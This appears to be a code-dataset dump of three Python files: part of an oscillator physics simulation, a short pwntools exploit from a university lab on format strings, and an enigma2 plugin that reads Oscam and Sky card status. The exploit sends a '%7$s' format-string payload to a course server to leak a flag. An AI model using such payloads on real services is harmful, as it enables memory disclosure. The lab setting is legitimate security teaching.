t_final = 75
F_drive = 10
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
print(natural_frequency)
epsilon = 0.1
frequency_drive = natural_frequency + epsilon
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency_drive)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, frequency_drive))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
plt.legend()
plt.savefig('beats.pdf')
plt.show()
#resonance conditions?: dt = 0.001, m = 1, p = 2, k = 1, v0 = 0, x0 = 1, t0 = 0, tf = 40, F0 = 1, omega = 1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp.pdf')
plt.show()
"""
# Resonance sweep for the damped, driven oscillator: for each drive
# frequency, run the simulation and record the maximum amplitude reached,
# then plot amplitude vs. drive frequency.
# NOTE(review): this section lies OUTSIDE the two triple-quoted (disabled)
# blocks, so it executes -- but `natural_frequency` and `b` are defined only
# inside those disabled sections, so running the file as-is raises a
# NameError here.  TODO confirm which sections are meant to be active.
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 20
F_drive = 10
# NOTE(review): `natural_frequency` is undefined at this point (see above).
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.8)
amplitudes = []
for frequency in frequency_array:
    # NOTE(review): `b` (damping coefficient) is also undefined here.
    x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
    # largest displacement reached during this run
    max_amp = np.max(x_drive)
    amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction_1.pdf')
plt.show()
"""
#non-linear resonance
dt = 0.0001
mass = 1
p_value = 4
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 60
F_drive = 1
x_natural, v_natural, t_natural = harmonic_oscillator_friction_beta(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,0,0,0)
natural_period, natural_frequency = find_period(v_natural, dt)
x_drive, v_drive, t_drive = harmonic_oscillator_drive(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,natural_frequency)
plt.figure(figsize = (8,14))
plt.title('beats driven oscillator, P = {0}, k = {1}, $F_0$ = {2}, $\\omega$ = {3}'.format(p_value, k_constant, F_drive, natural_frequency))
plt.plot(x_drive, t_drive, '-')
plt.plot(x_natural, t_natural, '-', alpha = 0.5)
#plt.axhline(y = natural_period, color = 'k', label = 'natural frequency')
#plt.axhline(y = 1/(0.1/(2*np.pi)), color = 'purple', label = 'beat frequency [1 period]')
plt.xlabel('x[m]')
plt.ylabel('t[s]')
plt.ylim(t_initial, t_final)
#plt.legend()
plt.savefig('beats_nonharmonic.pdf')
plt.show()
#effect of friction on amp v. drive frequency:
dt = 0.0001
mass = 1
p_value = 2
k_constant = 10
v_initial = 0
x_initial = 1
t_initial = 0
t_final = 75
F_drive = 10
b = 0.1
frequency_array = np.arange(natural_frequency/10, 10*natural_frequency, 0.1)
amplitudes = []
for frequency in frequency_array:
x_drive, v_drive, t_drive = harmonic_oscillator_drive_friction(p_value,k_constant,v_initial,x_initial,mass,dt,t_initial,t_final,F_drive,frequency, b)
max_amp = np.max(x_drive)
amplitudes.append(max_amp)
plt.figure()
plt.plot(frequency_array,amplitudes, '.')
plt.xlabel('$\\omega$')
plt.ylabel('A[m]')
plt.savefig('freqv.maxamp_friction.pdf')
plt.show()
"""
| 3,353 | 0 | 92 |
4cbf5d37297872ed7437ada33f59af00dbf496c6 | 201 | py | Python | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | Labs/5/FormatStrings/LocalShortRead/Exploit.py | Opty-MISCE/SS | 2010a7f93fdcaa50f835d827e531dc636abfe299 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7
s = remote(SERVER, PORT)
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))
s.close()
| 15.461538 | 45 | 0.661692 | #!/usr/bin/env python
from pwn import *
SERVER = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 10091
POS = 7
s = remote(SERVER, PORT)
s.sendline("%{}$s".format(POS))
print(s.recvuntil("}"))
s.close()
| 0 | 0 | 0 |
530d719ea9df225dbaff8e8de68097186795f2d1 | 33,600 | py | Python | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
] | null | null | null | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
] | 1 | 2016-10-09T15:57:10.000Z | 2016-10-09T15:58:16.000Z | plugin/OscamStatus.py | rdamas/oscam-skyde-status | 68a34b7c55aa7ffa405cd0fe3c74473ea9f70c67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class OscamConfig:
"""Auslesen der Config-Files einer laufenden Oscam-Installation
Momentan nur die oscam.conf auslesen, um emmlogdir und Webif-Zugangsdaten
zu ermitteln.
Außerdem eine Methode zum Auslesen der gespeicherten unique EMMs
"""
EMM_OK = 1
EMM_NOT_FOUND = 2
EMM_VAR_LOG = 3
EMM_NOCHANGE = 4
#
# Die Datei mit den gespeicherten Unique EMM einlesen, alle gespeicherten
# EMMs mit letztem aufgetretenem Datum zurückliefern. Zur Darstellung
# am TV die Serial und Data unkenntlich machen.
#
#
# Blank out emmlogdir directive in oscam.conf.
#
class OscamWebif:
"""Methods to fetch information via Oscam web interface:
- do we serve a supported card (V13, V14, Teleclub)?
- what's the label of that card
- get expire dates of entitlements
- write an EMM
"""
#
# GET request for web interface url.
#
# @param url string - url
# @return string - contents of url
#
#
# Read status page from Oscam JSON API
# @return string - json text with status information
#
#
# @param date string - input date string
# @return string - formatted date string
#
#
# Use Oscam JSON API to find out, if we have a local V13/V14 or
# Teleclub card running. We return reader and CAID of that card.
#
# @return None|dict
#
#
# Write EMM via web interface form.
#
# @param reader string - label of affected reader
# @param caid string - caid of affected reader
# @param emm strig - emm to write to card
# @param callback function - where to return to after writing
#
#
# Read payload from one line of live log data.
#
# @return string|None - payload if pattern matches.
#
#
# Read last payload from 10 seconds live log.
# Call callback function after read out.
#
#
# Read payload from live log.
# Switch to debug level 4, set a timer, finish read out in timer callback.
#
# @param callback function - where to return after finishing timer callback.
#
#
# Read tier ID's
#
# @param reader string - label of reader
#
class CardStatus:
"""Class that holds gathered information from running Oscam instance.
Is independent of enigma2 session, so testably without running enigma2.
Is inherited from class OscamStatus.
"""
#
# Look in oscam.version from temp file for ConfigDir parameter
# and supported features.
#
# @param tempdir string - directory where oscam.version lives.
# set self.oscamConfdir string - path to Oscam configuration directory
# set self.oscamWebifSupport bool - is webif support compiled into Oscam
# set self.oscamLivelogSupport - is live log support compiled into Oscam
#
#
# Find Oscam temp dir from running Oscam process.
# Check if process was startet with param -t or --temp-dir
#
# @return string - temp dir where oscam.version lives.
#
#
# Find out where oscam.conf lives.
# First try to to read out /tmp/.oscam/oscam.version
# If that does not exist, try to find it from running Oscam
#
#
# Get an OscamWebif object for communication via Web interface.
#
#
# Read tier IDs and expire date from Oscam web interface.
#
# set self.expires - expire date from webif
# set self.tiers - tiers list from webif
# set self.localhostAccess - can localhost access webif
# set self.webif - @class OscamWebif
# set self.status - reader and caid for Sky from webif
#
#
# Read unique EMM's from Oscam config dir
#
| 37.837838 | 205 | 0.521577 | # -*- coding: utf-8 -*-
import base64
import ConfigParser
import fileinput
import json
import os
import re
import requests
from enigma import eTimer, getDesktop, iServiceInformation
from Components.ActionMap import ActionMap
from Components.Label import Label
from Components.Sources.List import List
from Screens.MessageBox import MessageBox
from Screens.Screen import Screen
from __init__ import _
class WebifException(Exception):
    """Raised when the Oscam web interface request fails.

    The single argument carries the HTTP status code (or 521 for
    connection-level errors).
    """
class OscamConfig:
    """Read the configuration files of a running Oscam installation.

    Currently only oscam.conf is parsed, to determine emmlogdir and the
    web interface access data.  Also provides a method to read the saved
    unique EMMs.  (Translated from the original German docstring.)
    """
    # Result codes returned in the 'hint' field of getSavedEmm():
    EMM_OK = 1         # EMM log read successfully, new content available
    EMM_NOT_FOUND = 2  # no EMM log file found
    EMM_VAR_LOG = 3    # log lives under /var/log (volatile across reboots)
    EMM_NOCHANGE = 4   # log file unchanged since the previous read
    def __init__(self, confdir):
        """Parse <confdir>/oscam.conf immediately.

        @param confdir string - Oscam configuration directory
        """
        self.confdir = confdir
        self.cp = ConfigParser.SafeConfigParser()
        self.webif = None           # list of (key, value) pairs of [webif], or None
        self.emmlogdir = None       # directory holding the *_unique_emm.log files
        self.emmlogfileDate = 0     # mtime of the EMM log at the last read
        self._readOscamUser()
    def _readOscamUser(self):
        """Read emmlogdir and the [webif] section from oscam.conf.

        Falls back to the config directory when emmlogdir is unset and to
        'localhost' when no serverip is configured.
        """
        read = self.cp.read(self.confdir + '/oscam.conf')
        if read:
            try:
                self.emmlogdir = self.cp.get('global', 'emmlogdir')
                if self.emmlogdir == '':
                    self.emmlogdir = self.confdir
            except ConfigParser.NoOptionError:
                self.emmlogdir = self.confdir
            try:
                hostname = self.cp.get('global', 'serverip')
            except ConfigParser.NoOptionError:
                hostname = 'localhost'
            try:
                # inject the resolved hostname so getWebif() callers find it
                self.cp.set('webif', 'hostname', hostname)
                self.webif = self.cp.items('webif')
            except ConfigParser.NoSectionError:
                # no [webif] section configured
                pass
    def getWebif(self):
        """Return the [webif] section as a dict, or None if not configured."""
        if self.webif:
            return dict(self.webif)
        return None
    def _formatDate(self, date):
        """Convert 'YYYY/MM/DD rest' into 'DD.MM.YYYY rest'; pass through otherwise."""
        m = re.match(r"(\d+)/(\d+)/(\d+) (.*)", date)
        if m:
            return m.group(3)+"."+m.group(2)+"."+m.group(1)+" "+m.group(4)
        return date
    #
    # Read the file with the saved unique EMMs and return all saved EMMs
    # together with the date of their last occurrence.  Serial and data
    # are masked for display on the TV.
    # (Translated from the original German comment.)
    #
    def getSavedEmm(self, reader):
        """Collect the unique EMMs logged for <reader>.

        @param reader string - reader label
        @return dict - {'emm': [(first_seen, last_seen, masked_payload, raw_emm), ...]
                        sorted by last occurrence (newest first),
                        'hint': one of the EMM_* result codes}
        """
        logfile = self.emmlogdir + '/' + reader + '_unique_emm.log'
        print "[OSS OscamConfig.getSavedEmm] versuche '%s' zu lesen" % logfile
        seen = {}
        ret = []
        hint = self.EMM_OK
        try:
            stat = os.stat(logfile)
            # skip re-parsing when the file has not changed since last time
            if self.emmlogfileDate >= stat.st_mtime:
                hint = self.EMM_NOCHANGE
                print "[OSS OscamConfig.getSavedEmm] keine neuen EMMs"
            else:
                self.emmlogfileDate = stat.st_mtime
        except OSError as e:
            print "[OSS OscamConfig.getSavedEmm] I/O error: %s" % e.strerror
        if hint == self.EMM_OK:
            try:
                with open(logfile, 'r') as log:
                    for line in log:
                        # "<date> <time> <16-char serial> <hex emm> ..."
                        m = re.search(r"(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\s+[0-9A-Z]{16}\s+([0-9A-F]+)\s+", line.rstrip())
                        if m:
                            date = m.group(1)
                            key = m.group(2)
                            # track first and last occurrence per unique EMM
                            try:
                                if seen[key]['first'] > date:
                                    seen[key]['first'] = date
                                if seen[key]['last'] < date:
                                    seen[key]['last'] = date
                            except KeyError:
                                seen[key] = {}
                                seen[key]['first'] = date
                                seen[key]['last'] = date
            except IOError as e:
                print "[OSS OscamConfig.getSavedEmm] I/O error: %s" % e.strerror
                hint = self.EMM_NOT_FOUND
                # logs under /var/log vanish on reboot -> offer the fix
                if self.emmlogdir[0:8] == '/var/log':
                    hint = self.EMM_VAR_LOG
        if seen:
            # newest EMMs first
            keys = sorted(seen, key=lambda x: seen[x]['last'], reverse=True)
            for key in keys:
                # mask serial/data portions for on-screen display
                payload = key[0:6] + ' ' + key[6:8] + ' ######## ' + key[16:30] + ' ...'
                ret.append( ( self._formatDate(seen[key]['first']), self._formatDate(seen[key]['last']), payload, key) )
        return { 'emm': ret, 'hint': hint }
    #
    # Blank out emmlogdir directive in oscam.conf.
    #
    def reconfigEmmlogdir(self):
        """Rewrite oscam.conf in place (backup '.bak'), emptying any
        'emmlogdir = ...' line so EMMs get logged into the config dir."""
        file = fileinput.input(files=self.confdir+'/oscam.conf', inplace=True, backup='.bak')
        for line in file:
            line = line.strip()
            m = re.search(r"(emmlogdir\s*=)", line)
            if m:
                # keep only the bare directive, dropping the old value
                line = m.group(1)
            # fileinput inplace mode: print goes into the rewritten file
            print line
        file.close()
class OscamWebif:
    """Methods to fetch information via Oscam web interface:
    - do we serve a supported card (V13, V14, Teleclub)?
    - what's the label of that card
    - get expire dates of entitlements
    - write an EMM
    """
    def __init__(self, host, port, user=None, password=None):
        """Store connection data and prepare the one-shot live-log timer.

        @param host string - web interface host name or IP
        @param port string - web interface port
        @param user string|None - HTTP digest user, if authentication is used
        @param password string|None - HTTP digest password
        """
        self.webif = 'http://'+host+':'+port
        self.user = user
        self.password = password
        # extractPayload() fires 10 s after fetchPayload() enabled debug logging
        self.timer = eTimer()
        self.timer.callback.append(self.extractPayload)
        self.callback = None
        # mask credentials before logging them
        if password:
            password = '########'
        if user:
            user = '########'
        print("[OSS OscamWebif.__init__] OscamWebif(%s, %s, %s, %s)" % (host, port, user, password))
    #
    # GET request for web interface url.
    #
    # @param url string - url
    # @return string - contents of url
    # @raise WebifException - with the HTTP status code for non-200 answers,
    #        or 521 for connection-level failures
    #
    def _get(self, url):
        try:
            if self.user:
                r = requests.get(url, auth=requests.auth.HTTPDigestAuth(self.user, self.password))
            else:
                r = requests.get(url)
            print("[OSS OscamWebif._get] URL: %s => %s" % (url, r.status_code))
            if r.status_code != 200:
                raise WebifException(r.status_code)
        except WebifException:
            # fix: previously the broad handler below caught this as well and
            # replaced the real HTTP status code with 521
            raise
        except Exception as e:
            print("[OSS OscamWebif._get] catch exception %s" % e)
            raise WebifException(521)
        return r.text
    #
    # Read status page from Oscam JSON API
    # @return string - json text with status information
    #
    def getStatus(self):
        url = self.webif+'/oscamapi.json?part=status'
        return self._get(url)
    #
    # @param date string - input date string ("YYYY-MM-DDT...")
    # @return string - formatted date string ("DD. MM. YYYY"), or the
    #         input unchanged if it does not match
    #
    def _formatDate(self, date):
        m = re.match(r"(\d+)-(\d+)-(\d+)T.*", date)
        if m:
            return m.group(3)+". "+m.group(2)+". "+m.group(1)
        return date
    #
    # Use Oscam JSON API to find out, if we have a local V13/V14 or
    # Teleclub card running. We return reader and CAID of that card.
    #
    # @return None|dict - {'reader': ..., 'caid': ...} or None
    #
    def getStatusSky(self):
        status = self.getStatus()
        reader = None
        caid = None
        if status:
            obj = json.loads(status)
            clients = obj['oscam']['status']['client']
            for client in clients:
                conn = client['connection']
                if conn['$'] == 'CARDOK':
                    for ent in conn['entitlements']:
                        if ent['caid'] in ['09C4', '098C', '09B6']:
                            reader = client['rname_enc']
                            caid = ent['caid']
                            break
                    else:
                        # no matching entitlement in the status answer:
                        # fall back to the entitlement API of this reader
                        ent = self.getTiers(client['rname_enc'])
                        if ent['caid'] in ['09C4', '098C', '09B6']:
                            reader = client['rname_enc']
                            caid = ent['caid']
                            break
        if reader and caid:
            return { 'reader': reader, 'caid': caid }
        return None
    #
    # Write EMM via web interface form.
    #
    # @param reader string - label of affected reader
    # @param caid string - caid of affected reader
    # @param emm string - emm to write to card
    # @param callback function - where to return to after writing
    #
    def writeEmm(self, reader, caid, emm, callback):
        url = self.webif+'/emm_running.html?label=%s&emmfile=&emmcaid=%s&ep=%s&action=Launch' % (reader,caid,emm)
        self._get(url)
        callback()
    #
    # Read payload from one line of live log data.
    #
    # @return string|None - payload if pattern matches.
    #
    def getPayloadFromLine(self,line):
        m = re.search('(0F 0[46] .. .. .. .. .. ..)', line)
        if m:
            return m.group(1)
        return None
    #
    # Read last payload from 10 seconds live log.
    # Runs as timer callback; reports the result (or None) via self.callback.
    #
    def extractPayload(self):
        # switch live log back to debug level 0 and fetch the buffered lines
        url = self.webif+'/logpoll.html?debug=0'
        payload = None
        try:
            logpoll = self._get(url)
        except WebifException as e:
            # fix: a failing request used to raise out of the timer callback,
            # so the caller's callback was never invoked
            print("[OSS OscamWebif.extractPayload] catch exception %s" % e)
            logpoll = None
        if logpoll is not None:
            try:
                obj = json.loads(logpoll)
                lines = obj['oscam']['lines']
                foundPayloadHeader = False
                lookAhead = 2
                for line in lines:
                    decoded = base64.b64decode(line['line'])
                    if foundPayloadHeader:
                        # the payload line is expected two lines after the header
                        lookAhead -= 1
                        if lookAhead == 0:
                            payload = self.getPayloadFromLine(decoded)
                            foundPayloadHeader = False
                        continue
                    if 'Decrypted payload' in decoded:
                        lookAhead = 2
                        foundPayloadHeader = True
            except Exception as e:
                print("[OSS OscamWebif.extractPayload] catch exception %s" % e)
        if self.callback:
            self.callback(payload)
    #
    # Read payload from live log.
    # Switch to debug level 4, set a timer, finish read out in timer callback.
    #
    # @param callback function - where to return after finishing timer callback.
    #
    def fetchPayload(self, callback):
        url = self.webif+'/logpoll.html?debug=4'
        self._get(url)
        self.callback = callback
        self.timer.start(10000, True)
    #
    # Read tier ID's
    #
    # @param reader string - label of reader
    # @return dict - {'tiers': [...], 'expires': formatted date|None,
    #                 'caid': caid of the card|None}
    #
    def getTiers(self, reader):
        url = self.webif+'/oscamapi.json?part=entitlement&label=%s' % reader
        entitlements = self._get(url)
        tiers = []
        expires = None
        caid = None
        try:
            obj = json.loads(entitlements)
            for line in obj['oscam']['entitlements']:
                tiers.append( line['id'][-4:] )
                # the '00xx' tier carries the card's expire date
                if not expires and line['id'][-4:-2] == '00':
                    expires = self._formatDate(line['expireDate'])
                caid = line['caid']
        except Exception:
            # fix: narrowed from a bare except; a malformed answer still
            # yields the empty default result
            pass
        return { 'tiers': tiers, 'expires': expires, 'caid': caid }
class CardStatus:
    """Class that holds gathered information from running Oscam instance.
    Is independent of enigma2 session, so testably without running enigma2.
    Is inherited from class OscamStatus.
    """
    def __init__(self, session):
        """Collect static information about the running Oscam instance.

        @param session - enigma2 session (kept for subclasses)
        """
        self.session = session
        # filled by getOscamInformation() / getCardStatus():
        self.oscamConfdir = None         # Oscam configuration directory
        self.oscamWebifSupport = None    # webif compiled in and enabled?
        self.oscamLivelogSupport = None  # live log compiled in?
        self.oscamWebifPort = None       # webif port from oscam.version
        self.localhostAccess = None      # may localhost access the webif?
        self.status = None               # {'reader':..., 'caid':...} of the card
        self.tiers = None                # list of tier ids
        self.hint = None                 # OscamConfig.EMM_* result code
        self.expires = None              # formatted card expire date
        self.list = None                 # EMM list for the screen widget
        self.webif = None                # OscamWebif instance
        self.oscamConfig = None          # OscamConfig instance
        self.getOscamInformation()
    #
    # Look in oscam.version from temp file for ConfigDir parameter
    # and supported features.
    #
    # @param tempdir string - directory where oscam.version lives.
    # set self.oscamConfdir string - path to Oscam configuration directory
    # set self.oscamWebifSupport bool - is webif support compiled into Oscam
    # set self.oscamLivelogSupport - is live log support compiled into Oscam
    #
    def readOscamVersion(self, tempdir):
        """Parse <tempdir>/oscam.version line by line for build/runtime info."""
        try:
            for line in open(os.path.join(tempdir, 'oscam.version'), 'rb'):
                if 'ConfigDir:' in line:
                    self.oscamConfdir = line.split(":")[1].strip()
                    print "[OSS CardStatus.readOscamVersion] confdir:", self.oscamConfdir
                if 'Web interface support:' in line:
                    self.oscamWebifSupport = line.split(":")[1].strip() == 'yes'
                    print "[OSS CardStatus.readOscamVersion] webif support:", self.oscamWebifSupport
                if 'LiveLog support:' in line:
                    self.oscamLivelogSupport = line.split(":")[1].strip() == 'yes'
                    print "[OSS CardStatus.readOscamVersion] livelog support:", self.oscamLivelogSupport
                if 'WebifPort:' in line:
                    self.oscamWebifPort = line.split(":")[1].strip()
                    print "[OSS CardStatus.readOscamVersion] webif port:", self.oscamWebifPort
                #
                # Configuration without web interface (port 0 disables it)
                if self.oscamWebifPort == "0":
                    self.oscamWebifSupport = False
                    print "[OSS CardStatus.readOscamVersion] webif not enabled"
        except Exception as e:
            print "[OSS CardStatus.readOscamVersion] kann", tempdir, "nicht öffnen:", e
    #
    # Find Oscam temp dir from running Oscam process.
    # Check if process was startet with param -t or --temp-dir
    #
    # @return string - temp dir where oscam.version lives.
    #
    def getOscamTempdir(self):
        """Scan /proc/<pid>/cmdline of all processes for an oscam binary and
        extract its -t/--temp-dir argument, if any."""
        tempdir = None
        pids = [pid for pid in os.listdir('/proc') if pid.isdigit()]
        for pid in pids:
            try:
                cmdline = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read()
                # cmdline is NUL-separated argv
                cmdpart = cmdline.lower().split('\0')
                # @tested
                if '/oscam' in cmdpart[0] or cmdpart[0][0:5] == 'oscam':
                    nextIsTempDir = False
                    for part in cmdpart:
                        # @tested
                        if '--temp-dir' in part:
                            # "--temp-dir=<path>": strip the option prefix
                            tempdir = part[11:]
                            break
                        # @tested
                        if part == '-t':
                            # path follows in the next argv element
                            nextIsTempDir = True
                            continue
                        if nextIsTempDir:
                            tempdir = part.rstrip('/')
                            nextIsTempDir = False
                            break
            except IOError: # proc has terminated
                continue
        return tempdir
    #
    # Find out where oscam.conf lives.
    # First try to to read out /tmp/.oscam/oscam.version
    # If that does not exist, try to find it from running Oscam
    #
    def getOscamInformation(self):
        """Locate the Oscam temp dir and parse oscam.version from it."""
        tempdir = '/tmp/.oscam'
        # @tested
        if not os.path.exists(tempdir):
            tempdir = self.getOscamTempdir()
        # @tested
        if tempdir and os.path.exists(tempdir):
            self.readOscamVersion(tempdir)
    #
    # Get an OscamWebif object for communication via Web interface.
    #
    def getOscamWebif(self):
        """Build an OscamWebif from oscam.conf's [webif] section.

        @return OscamWebif
        @raise WebifException(501) when webif support is missing
        """
        if self.oscamWebifSupport:
            user = self.oscamConfig.getWebif()
            httpuser = None
            httppwd = None
            if user:
                try:
                    httpuser = user['httpuser']
                except KeyError:
                    pass
                try:
                    httppwd = user['httppwd']
                except KeyError:
                    pass
                self.localhostAccess = True
                try:
                    httpallowed = user['httpallowed']
                    print "[OSS CardStatus.getOscamWebif] httpallowed:", httpallowed
                    # when an allow-list exists, localhost must be on it
                    if '127.0.0.' not in httpallowed and '::1' not in httpallowed:
                        self.localhostAccess = False
                except:
                    pass
            # null config Oscam: no [webif] section, but a known port
            elif self.oscamWebifPort:
                user = { 'hostname': '127.0.0.1', 'httpport': self.oscamWebifPort, }
            # NOTE(review): if user is None and no oscamWebifPort is known,
            # the subscript below raises TypeError -- TODO confirm intended.
            return OscamWebif(user['hostname'], user['httpport'], httpuser, httppwd)
        else:
            print "[OSS CardStatus.getOscamWebif] no webif support"
            raise WebifException(501)
    #
    # Read tier IDs and expire date from Oscam web interface.
    #
    # set self.expires - expire date from webif
    # set self.tiers - tiers list from webif
    # set self.localhostAccess - can localhost access webif
    # set self.webif - @class OscamWebif
    # set self.status - reader and caid for Sky from webif
    #
    def getCardStatus(self):
        #
        # Read the webif config from oscam.conf, then query the card status.
        #
        if self.oscamConfdir:
            # search for a V13/V14 reader via the Oscam web API
            self.oscamConfig = OscamConfig(self.oscamConfdir)
            self.webif = self.getOscamWebif()
            try:
                self.status = self.webif.getStatusSky()
            except WebifException as e:
                print "[OSS CardStatus.getCardStatus] catch exception", e
            if self.status:
                # show the saved unique EMMs
                self.getSavedEmm()
                # read tier IDs and expire date of the card
                try:
                    tiers = self.webif.getTiers(self.status['reader'])
                    self.tiers = tiers['tiers']
                    self.expires = tiers['expires']
                except WebifException as e:
                    print "[OSS CardStatus.getCardStatus] catch exception", e
        else:
            print "[OSS CardStatus.getCardStatus] no oscam conf dir found"
    #
    # Read unique EMM's from Oscam config dir
    #
    def getSavedEmm(self):
        """Fill self.list with a header row plus the reader's saved EMMs."""
        print "[OSS CardStatus.getSavedEmms] "
        if self.status:
            retemm = self.oscamConfig.getSavedEmm(self.status['reader'])
            self.hint = retemm['hint']
            # header row for the on-screen list widget
            self.list = [ ("Erstes Vorkommen", "Letztes Vorkommen", "EMM", "")]
            self.list.extend( retemm['emm'] )
            print "[OSS CardStatus.getSavedEmms] show", len(retemm['emm']), "EMMs"
class OscamStatus(Screen, CardStatus):
version = "2017-06-14 1.4"
skin = { "fhd": """
<screen name="OscamStatus" position="0,0" size="1920,1080" title="Oscam Sky DE Status" flags="wfNoBorder">
<widget name="expires" position="20,20" size="600,36" font="Regular;25" />
<widget name="payload" position="620,20" size="700,36" font="Regular;25" />
<widget name="f0tier" position="1340,20" size="400,36" font="Regular;25" />
<widget name="headline" position="20,60" size="1320,76" font="Regular;25" />
<widget name="cardtype" position="1340,60" size="400,76" font="Regular;25" />
<widget render="Listbox" source="emmlist" enableWrapAround="0"
position="20,100" size="1880,880" transparent="1"
font="Regular;25" zPosition="5" scrollbarMode="showOnDemand"
scrollbarSliderBorderWidth="0" scrollbarWidth="5">
<convert type="TemplatedMultiContent">{
"template": [
MultiContentEntryText(
pos = (10, 10),
size = (380, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 0),
MultiContentEntryText(
pos = (400, 10),
size = (380, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 1),
MultiContentEntryText(
pos = (790, 10),
size = (1000, 40),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP | RT_WRAP,
text = 2),
],
"fonts": [gFont("Regular", 24)],
"itemHeight": 50 }
</convert>
</widget>
<widget name="key_red" position="20,1000" zPosition="1" size="400,50" font="Regular;20" halign="center" valign="center" backgroundColor="#f01010" foregroundColor="#ffffff" transparent="0" />
<widget name="key_green" position="440,1000" zPosition="1" size="400,50" font="Regular;20" halign="center" valign="center" backgroundColor="#10a010" foregroundColor="#ffffff" transparent="0" />
</screen>
""",
"hd": """
<screen name="OscamStatus" position="0,0" size="1280,720" title="Oscam Sky DE Status" flags="wfNoBorder">
<widget name="expires" position="10,10" size="400,24" font="Regular;18" />
<widget name="payload" position="420,10" size="430,24" font="Regular;18" />
<widget name="f0tier" position="860,10" size="330,24" font="Regular;18" />
<widget name="headline" position="10,40" size="840,45" font="Regular;18" />
<widget name="cardtype" position="860,40" size="330,45" font="Regular;18" />
<widget render="Listbox" source="emmlist" enableWrapAround="0"
position="10,90" size="1260,560" transparent="1"
font="Regular;18" zPosition="5" scrollbarMode="showOnDemand"
scrollbarSliderBorderWidth="0" scrollbarWidth="5">
<convert type="TemplatedMultiContent">{
"template": [
MultiContentEntryText(
pos = (10, 10),
size = (250, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 0),
MultiContentEntryText(
pos = (270, 10),
size = (250, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP,
text = 1),
MultiContentEntryText(
pos = (530, 10),
size = (640, 33),
font = 0,
flags = RT_HALIGN_LEFT | RT_VALIGN_TOP | RT_WRAP,
text = 2),
],
"fonts": [gFont("Regular", 18)],
"itemHeight": 40 }
</convert>
</widget>
<widget name="key_red" position="10,666" zPosition="1" size="300,33" font="Regular;16" halign="center" valign="center" backgroundColor="#f01010" foregroundColor="#ffffff" transparent="0" />
<widget name="key_green" position="320,666" zPosition="1" size="300,33" font="Regular;16" halign="center" valign="center" backgroundColor="#10a010" foregroundColor="#ffffff" transparent="0" />
</screen>
""" }
hintText = {
1: 'Liste der gespeicherten EMMs - mit OK zum Schreiben auswählen.',
2: 'Keine EMMs gefunden. 90 Minuten auf einem Sky-Kanal warten.',
3: 'Keine EMMs. Tipp: "emmlogdir" mit "grün" fixen.'
}
def __init__(self, session):
self.session = session
self.status = None
self.list = None
self.tiers = None
self.expires = None
self.hint = None
self.emmToWrite = None
self.payload = None
self.adaptScreen()
self.skin = OscamStatus.skin[self.useskin]
self.timerRereadEmms = eTimer()
self.timerRereadEmms.callback.append(self.showEmms)
CardStatus.__init__(self, session)
Screen.__init__(self, session)
self['actions'] = ActionMap(['ColorActions', 'WizardActions'], {
"back": self.cancel,
"ok": self.ok,
"red": self.red,
"green": self.green,
}, -1)
